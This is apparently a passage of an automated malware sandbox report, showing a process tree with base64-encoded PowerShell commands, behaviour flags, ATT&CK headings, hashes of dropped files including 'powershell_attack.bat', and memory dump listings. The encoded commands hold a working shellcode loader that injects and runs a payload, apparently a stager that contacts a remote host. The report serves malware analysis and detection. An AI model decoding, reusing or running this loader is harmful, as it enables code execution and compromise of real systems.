wBjAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAEkAagArACsAKQB7ACQAdgBOADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQARwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEkAagApACwAIAAkAHMAYwBbACQASQBqAF0ALAAgADEAKQB9ADsAJAB2AE4AOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQARwBIACwAIAAwAHgAMQAwADAAMQAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAaQBHAGEAKQA7ACQATwBwAGwAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAdgBOADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABPAHAAbAAsACQARwBIACwAMAAsADAALAAwACkAOwAnADsAJABLAGYAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAE4AaQApACkAOwAkAFEARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABLAFgAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQATwB3AFYAIAA9ACAAIgBDADoAXAAkAEsAWABcAE0AVwBEAHQAVQBCAEgAdgBcACQASwBYACQAUQBHAFwAdgAxAC4AMABcACQAUQBHACIAOwAkAE8AdwBWACAAPQAgACQATwB3AFYALgByAGUAcABsAGEAYwBlACgAIgBNAFcARAB0ACIALAAgACIAcwB5AHMAIgApADsAJABPAHcAVgAgAD0AIAAkAE8AdwBWAC4AcgBlAHAAbABhAGMAZQAoACIAVQBCAEgAdgAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAeABUACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAeABUACcAKQB7ACQAUQBHAD0AIAAkAE8AdwBWAH0AOwAkAEwAcQA9ACIAIAAkAFEARwAgAG8ATABIAEkAIAAkAEsAZgAiADsAJABMAHEAPQAkAEwAcQAuAHIAZQBwAGwAYQBjAGUAKAAiAG8ATABIAEkAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABMAHEA')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABOAGkAPQAnACQATABLAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABpAEcAYQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAcwBjAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQBlADgALAB9ADMAZQAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANABkACwAfQA2AGYALAB9ADcAYQAsAH0ANgA5ACwAfQA2AGMALAB9ADYAYwAsAH0ANgAxACwAfQAyAGYALAB9ADMANQAsAH0AMgBlACwAfQAzADAALAB9ADIAMAAsAH0AMgA4ACwAfQA1ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADQALAB9ADYAZgAsAH0ANwA3ACwAfQA3ADMALAB9ADIAMAAsAH0ANABlACwAfQA1ADQALAB9ADIAMAAsAH0AMwA2ACwAfQAyAGUALAB9ADMAMQAsAH0AMwBiACwAfQAyADAALAB9ADUANAAsAH0ANwAyACwAfQA2ADkALAB9ADYANAAsAH0ANgA1ACwAfQA2AGUALAB9ADcANAAsAH0AMgBmACwAfQAzADcALAB9ADIAZQAsAH0AMwAwACwAfQAzAGIALAB9ADIAMAAsAH0ANwAyACwAfQA3ADYALAB9ADMAYQAsAH0AMwAxACwAfQAzADEALAB9ADIAZQAsAH0AMwAwACwAfQAyADkALAB9ADIAMAAsAH0ANgBjACwAfQA2ADkALAB9ADYAYgAsAH0ANgA1ACwAfQAyADAALAB9ADQANwAsAH0ANgA1ACwAfQA2ADMALAB9ADYAYgAsAH0ANgBmACwAfQAwADAALAB9ADYAOAAsAH0AMwBhACwAfQA1ADYALAB9ADcAOQAsAH0AYQA3ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAzACwAfQA1ADMALAB9ADUAMwAsAH0ANgA4ACwAfQBiAGIALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9AGUAOAAsAH0ANQAxACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyAGYALAB9ADYAMgAsAH0ANgA3ACwAfQA1AGEALAB9ADUAMAAsAH0AMwAzACwAfQA1ADgALAB9ADMANQAsAH0ANQA1ACwAfQA0AGYALAB9ADYAZQAsAH0ANwA5ACwAfQA1ADAALAB9ADcAOQAsAH0AMwA0ACwAfQAzADcALAB9ADQAYgAsAH0AMwAwACwAfQA1ADQALAB9ADQAZAAsAH0ANQBhACwAfQA0AGMALAB9ADYANwAsAH0ANwAxACwAfQA0ADgALAB9ADYAMQAsAH0ANwAyACwAfQA3ADcALAB9ADMAMgAsAH0ANAA4ACwAfQA1ADYALAB9ADMAMQAsAH0ANABkACwAfQA2ADkALAB9ADMAOAAsAH0ANwA4ACwAfQAzADMALAB9ADUANwAsAH0ANAA4ACwAfQA1ADgALAB9ADcANgAsAH0ANwA1ACwAfQA2AGUALAB9ADUAMwAsAH0ANQA0ACwAfQA0ADcALAB9ADYAZAAsAH0ANQA4ACwAfQA2ADUALAB9ADUAZgAsAH0ANABlACwAfQA1ADQALAB9ADQAZAAsAH0ANQAwACwAfQA2ADIALAB9ADMANgAsAH0AMgBkACwAfQA0ADQALAB9ADYAZQAsAH0ANwBhACwAfQA3ADcALAB9ADUANAAsAH0ANAA2ACwAfQA2ADQALAB9ADUANQAsAH0ANgA3ACwAfQA1ADMALAB9ADQAMgAsAH0ANgBlACwAfQAzADIALAB9ADUANQAsAH0ANAA2ACwAfQA2AGEALAB9ADYAMQAsAH0ANgA1ACwAfQA3ADQALAB9ADMAMQAsAH0AMwAzACwAfQA3ADYALAB9ADQAYwAsAH0ANQAyACwAfQA0ADUALAB9ADcAMQAsAH0ANwAwACwAfQA1AGYALAB9ADUAMAAsAH0ANwA2ACwAfQA0ADgALAB9ADUAMwAsAH0AMwAzACwAfQA3AGEALAB9ADYAZQAsAH0ANAA1ACwAfQA3ADEALAB9ADYAMQAsAH0ANQBhACwAfQA0AGYALAB9ADYAOAAsAH0AMwAyACwAfQA0ADIALAB9ADQAMQAsAH0ANQAyACwAfQA3ADIALAB9ADcAMQAsAH0ANgA1ACwAfQAzADIALAB9ADcANAAsAH0ANQAzACwAfQA2ADUALAB9ADUAMgAsAH0AMwAwACwAfQAyAGQALAB9ADQANQAsAH0ANQA5ACwAfQA3ADEALAB9ADUANQAsAH0ANQA0ACwAfQA3ADEALAB9ADUANwAsAH0ANgA3ACwAfQA0ADgALAB9ADQANgAsAH0ANgAzACwAfQA1ADAALAB9ADcANQAsAH0ANAA0ACwAfQA0AGQALAB9ADQAZgAsAH0AMwAzACwAfQA0ADUALAB9ADYANAAsAH0ANABlACwAfQA0AGMALAB9ADIAZAAsAH0ANgAzACwAfQAzADUALAB9ADQANQAsAH0ANwA5ACwAfQAzADUALAB9ADcAOQAsAH0ANQAyACwAfQA1ADMALAB9ADMANAAsAH0ANgBjACwAfQA0ADgALAB9ADQAMwAsAH0ANwBhACwAfQA3ADMALAB9ADMAOQAsAH0ANQBhACwAfQA1ADgALAB9ADcAOQAsAH0ANAA5ACwAfQA3ADQALAB9ADQAYQAsAH0ANgA2ACwAfQA1ADkALAB9ADUANwAsAH0ANABkACwAfQA1ADYALAB9ADQAZQAsAH0ANQA0ACwAfQA3ADYALAB9ADYAMgAsAH0AMwA1ACwAfQAzADEALAB9ADYANwAsAH0ANgBhACwAfQA2ADkALAB9ADcANgAsAH0ANgA3ACwAfQA2ADIALAB9ADQANwAsAH0ANgA4ACwAfQA2AGEALAB9ADIAZAAsAH0ANAA1ACwAfQA3ADcALAB9ADMAOAAsAH0ANgA3ACwAfQA2AGMALAB9ADcANAAsAH0ANgBiACwAfQA3ADMALAB9ADQAZgAsAH0ANQA2ACwAfQA2AGMALAB9ADYAYQAsAH0ANABiACwAfQA2ADgALAB9ADcANAAsAH0AMwA3ACwAfQA3ADUALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADUANwAsAH0AOAA5ACwAfQA5AGYALAB9AGMANgAsAH0AZgBmACwAfQBkADUALAB9ADgAOQAsAH0AYwA2ACwAfQA1ADMALAB9ADYAOAAsAH0AMAAwACwAfQAzADIALAB9AGUAMAAsAH0AOAA0ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADcALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9AGUAYgAsAH0ANQA1ACwAfQAyAGUALAB9ADMAYgAsAH0AZgBmACwAfQBkADUALAB9ADkANgAsAH0ANgBhACwAfQAwAGEALAB9ADUAZgAsAH0ANgA4ACwAfQA4ADAALAB9ADMAMwAsAH0AMAAwACwAfQAwADAALAB9ADgAOQAsAH0AZQAwACwAfQA2AGEALAB9ADAANAAsAH0ANQAwACwAfQA2AGEALAB9ADEAZgAsAH0ANQA2ACwAfQA2ADgALAB9ADcANQAsAH0ANAA2ACwAfQA5AGUALAB9ADgANgAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9ADIAZAAsAH0AMAA2ACwAfQAxADgALAB9ADcAYgAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9ADEANAAsAH0ANgA4ACwAfQA4ADgALAB9ADEAMwAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANAA0ACwAfQBmADAALAB9ADMANQAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0ANABmACwAfQA3ADUALAB9AGMAZAAsAH0AZQA4ACwAfQA0AGEALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0ANAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMQAwACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQAwADAALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADUAMwAsAH0ANgA4ACwAfQA1ADgALAB9AGEANAAsAH0ANQAzACwAfQBlADUALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADMALAB9ADUAMwAsAH0ANQAzACwAfQA4ADkALAB9AGUANwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMAAsAH0AMgAwACwAfQAwADAALAB9ADAAMAAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMQAyACwAfQA5ADYALAB9ADgAOQAsAH0AZQAyACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AYwBmACwAfQA4AGIALAB9ADAANwAsAH0AMAAxACwAfQBjADMALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9AGUANQAsAH0ANQA4ACwAfQBjADMALAB9ADUAZgAsAH0AZQA4ACwAfQA2AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADMAMQAsAH0AMwA2ACwAfQAzADcALAB9ADIAZQAsAH0AMwA5ACwAfQAzADkALAB9ADIAZQAsAH0AMwA3ACwAfQAzADMALAB9ADIAZQAsAH0AMwAxACwAfQAzADQALAB9ADMAMwAsAH0AMAAwACwAfQBiAGIALAB9AGYAMAAsAH0AYgA1ACwAfQBhADIALAB9ADUANgAsAH0ANgBhACwAfQAwADAALABADUAMwAsAH0AZgBmACwAfQBkADUAIgA7ACQAdgBOAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABMAEsAIAAtAE4AYQBtAGUAIAAiAFAARAAiACAALQBuAGEAbQBlAHMAIABzAGcATQA7ACQAdgBOAD0AJAB2AE4ALgByAGUAcABsAGEAYwBlACgAIgBzAGcATQAiACwAIAAiAFcAaQBuADMAMgBGAHUAIgArACIAbgAiACsAIgBjAHQAaQBvAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJABzAGMAIAA9ACAAJABzAGMALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAHEAdwB3AHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAcQB3AHcAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAE8ASQA9ADAAeAAxADAAMAAxADsAaQBmACAAKAAkAHMAYwAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAAxACkAewAkAE8ASQA9ACQAcwBjAC4ATAB9ADsAJABHAEgAPQAkAHYATgA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAAMQAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAaQBHAGEAIAA9ACAAMAA7AGYAbwByACgAJABJAGoAPQAwADsAJABJAGoAIAAtAGwAZQAoACQAcwBjAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAEkAagArACsAKQB7ACQAdgBOADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQARwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEkAagApACwAIAAkAHMAYwBbACQASQBqAF0ALAAgADEAKQB9ADsAJAB2AE4AOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQARwBIACwAIAAwAHgAMQAwADAAMQAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAaQBHAGEAKQA7ACQATwBwAGwAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAdgBOADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABPAHAAbAAsACQARwBIACwAMAAsADAALAAwACkAOwAnADsAJABLAGYAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAE4AaQApACkAOwAkAFEARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABLAFgAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQATwB3AFYAIAA9ACAAIgBDADoAXAAkAEsAWABcAE0AVwBEAHQAVQBCAEgAdgBcACQASwBYACQAUQBHAFwAdgAxAC4AMABcACQAUQBHACIAOwAkAE8AdwBWACAAPQAgACQATwB3AFYALgByAGUAcABsAGEAYwBlACgAIgBNAFcARAB0ACIALAAgACIAcwB5AHMAIgApADsAJABPAHcAVgAgAD0AIAAkAE8AdwBWAC4AcgBlAHAAbABhAGMAZQAoACIAVQBCAEgAdgAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAeABUACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAeABUACcAKQB7ACQAUQBHAD0AIAAkAE8AdwBWAH0AOwAkAEwAcQA9ACIAIAAkAFEARwAgAG8ATABIAEkAIAAkAEsAZgAiADsAJABMAHEAPQAkAEwAcQAuAHIAZQBwAGwAYQBjAGUAKAAiAG8ATABIAEkAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABMAHEA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0cxdhbk9.dll
Filesize
3KB

MD5
c4967da598349092261d1abe13d4f477

SHA1
d30672c5c41993a86272b61befeec87eb1dc84f9

SHA256
930eac16e348e9dbecafcdaaf169accb46b29194c7345a99e29576664010fb98

SHA512
42293c8f38b1502d86b2b71a92ca186d0c66e811f47275c19fdc52221b97e5e1e9717ffb511106d5c448c5131f484964934b9e5c0f4e66f378d9e08ada81ea70

Download Submit
C:\Users\Admin\AppData\Local\Temp\0cxdhbk9.pdb
Filesize
7KB

MD5
332af91a605d98b146b541230f28fed8

SHA1
7697582f0c3706bd41200b92e65f30dbd5a9b59e

SHA256
3177115837569fd23352be4ea764289fffd064395610998585ebe1ec72f366f8

SHA512
0564d826e260e5330cb77ba1ed254082f0fc2703170dbb905a5e3b315b8f1ee4600cbc635796efc0a8b1b372de14d87946e5d28b17e372f3f5adb65ec1c5a56b

Download Submit
C:\Users\Admin\AppData\Local\Temp\17D5.tmp\powershell_attack.bat
Filesize
12KB

MD5
1785e5cd9ec2cc8ac5362be1a23a0dc0

SHA1
79b4ed7ee3d1a96f2ee9e916a958428951f16ac4

SHA256
0d4ae81009d4b43eb5fadee47e2770b3b6c8b1553c8ce1a345c2756fc6df4b46

SHA512
bc7ec174169a5ac27282665d8d68a3ac8d505d7ec8939a64dedbc7966f9c27cfcc3cb1812384cc9d5fac12779561595bbb11f8909f09ec0e6529035b0e0d3e8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3287.tmp
Filesize
1KB

MD5
d3be5b9d9cd3bb7d616a93e955f30255

SHA1
4b86ce59964c480fbfd85ec245d844732a19ce04

SHA256
9dce3dfb40a7a988b03b2197347330e3f508bed3d1f4f55fb5da4bc5afd76181

SHA512
b7d8bb4a8b81a693c60d92c025482a6dbc902c419a139bb4f617243a56b9212811220adca88fd9a135e55c41b8f90cfd4d617476b2ae1532c6d049e76ea99859

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
1c6809e9d5b38e181669e977ad213bfe

SHA1
4983adeb92c897d7064b751f415b7cd371703869

SHA256
3e004b74332ce4c74cb8bd25786abe386cddcb489679af4ed2f7136b61245733

SHA512
cf311842850bea2bd0a3564819c0b7ecce83ec8a22f3c7fd7e36179a577a5265dd72c233fab0152604fa5f97f392ae1b99809b18603e2a233c6ff76586ff4570

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
1c6809e9d5b38e181669e977ad213bfe

SHA1
4983adeb92c897d7064b751f415b7cd371703869

SHA256
3e004b74332ce4c74cb8bd25786abe386cddcb489679af4ed2f7136b61245733

SHA512
cf311842850bea2bd0a3564819c0b7ecce83ec8a22f3c7fd7e36179a577a5265dd72c233fab0152604fa5f97f392ae1b99809b18603e2a233c6ff76586ff4570

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
1c6809e9d5b38e181669e977ad213bfe

SHA1
4983adeb92c897d7064b751f415b7cd371703869

SHA256
3e004b74332ce4c74cb8bd25786abe386cddcb489679af4ed2f7136b61245733

SHA512
cf311842850bea2bd0a3564819c0b7ecce83ec8a22f3c7fd7e36179a577a5265dd72c233fab0152604fa5f97f392ae1b99809b18603e2a233c6ff76586ff4570

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0cxdhbk9.0.cs
Filesize
411B

MD5
41ba4b3b8106894e8655637596b69adc

SHA1
187d4168e5e8dc43fd18ee55bb1295bd1ec0857c

SHA256
471bc6c608d1dd6b434b9b24e52e909c881f095ef897b8120e7a7f9e3cca961a

SHA512
28bc16c4925282bd3a98e07b22a206739d1bc0fd5c63d0c092c73428806f5a9f367d0686b81a4738a17cf0c73f28052b75431b247a56e676df7e21bd92f193e5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0cxdhbk9.cmdline
Filesize
309B

MD5
9c3613cd458e95267bdc8d5773d903ba

SHA1
8f245381b7d4d3e81c06cadecd16157a33a35843

SHA256
5bbaad11845bacad7823a30223758d0957c0654c2c9f2091315919146c1350a1

SHA512
dac89f0eba70c506a6d8381eae7a729db693104af19bc93c9cd78986623c99bf024e5605ffe6d41121fa670c5e588a2f5c46c03382bffb80bf21504fb8c459a5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3277.tmp
Filesize
652B

MD5
bbf1f4acb8be30c9bcf15cb0990d6cd3

SHA1
01be9262e6083e0d63644025011ee90dc86e092b

SHA256
525396c6d6fa143d0259db19e05bca42ae839421f5e28d15ae2b9127c7cd19d1

SHA512
e15128595011f17a1f529aec241eacf41a397d7866d08a7897ab2a23cb23d3679aa18261886ca18d3f099f329a48f4fcea41a297be6ae4d71d5b221c4fc0eb2f

Download Submit
memory/632-54-0x000007FEFC151000-0x000007FEFC153000-memory.dmp

Filesize
8KB

Download
memory/1252-66-0x000007FEF3810000-0x000007FEF436D000-memory.dmp

Filesize
11.4MB

Download
memory/1252-68-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/1252-69-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/1252-73-0x000000000262B000-0x000000000264A000-memory.dmp

Filesize
124KB

Download
memory/1252-65-0x000007FEF4370000-0x000007FEF4D93000-memory.dmp

Filesize
10.1MB

Download
memory/1252-62-0x0000000000000000-mapping.dmp

Download
memory/1352-88-0x000007FEF4D10000-0x000007FEF5733000-memory.dmp

Filesize
10.1MB

Download
memory/1352-89-0x000007FEF41B0000-0x000007FEF4D0D000-memory.dmp

Filesize
11.4MB

Download
memory/1352-91-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/1352-85-0x0000000000000000-mapping.dmp

Download
memory/1456-55-0x0000000000000000-mapping.dmp

Download
memory/1640-84-0x0000000002844000-0x0000000002847000-memory.dmp

Filesize
12KB

Download
memory/1640-79-0x0000000000000000-mapping.dmp

Download
memory/1640-82-0x000007FEF4D10000-0x000007FEF5733000-memory.dmp

Filesize
10.1MB

Download
memory/1640-83-0x000007FEF41B0000-0x000007FEF4D0D000-memory.dmp

Filesize
11.4MB

Download
memory/1640-90-0x000000000284B000-0x000000000286A000-memory.dmp

Filesize
124KB

Download
memory/1716-74-0x0000000000000000-mapping.dmp

Download
memory/1944-57-0x0000000000000000-mapping.dmp

Download
memory/1944-60-0x000007FEF3810000-0x000007FEF436D000-memory.dmp

Filesize
11.4MB

Download
memory/1944-59-0x000007FEF4370000-0x000007FEF4D93000-memory.dmp

Filesize
10.1MB

Download
memory/1944-67-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/1944-61-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/2000-70-0x0000000000000000-mapping.dmp

Download